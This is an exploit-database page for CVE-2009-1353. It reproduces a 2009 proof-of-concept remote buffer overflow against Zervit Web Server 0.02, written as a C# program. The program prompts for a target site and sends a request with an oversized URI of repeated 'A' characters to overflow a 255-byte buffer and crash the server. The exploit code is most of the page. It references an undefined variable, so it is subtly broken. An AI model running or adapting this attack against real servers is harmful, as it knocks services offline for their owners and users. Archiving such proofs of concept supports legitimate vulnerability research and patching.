Lucene search
+L

Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)

🗓️ 15 Apr 2009 00:00:00Reported by e.wiZz!Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Zervit Web Server 0.02 - Remote Buffer Overflow (PoC) by e.wiZz! Found using ServMeNot on www.balcansecurity.com, overflow occurs when requested URI isn't found. Using HttpWebRequest to exploit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1353
15 Apr 200900:00
circl
cve
CVE
CVE-2009-1353
21 Apr 200916:00
cve
cvelist
Cvelist
CVE-2009-1353
21 Apr 200916:00
cvelist
nvd
NVD
CVE-2009-1353
21 Apr 200916:24
nvd
openvas
OpenVAS
Zervit Webserver multiple vulnerabilities
14 May 200900:00
openvas
openvas
OpenVAS
Zervit Webserver 0.2 - 0.4 Multiple Vulnerabilities
14 May 200900:00
openvas
prion
Prion
Buffer overflow
21 Apr 200916:24
prion
####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)

            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

// milw0rm.com [2009-04-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07794
38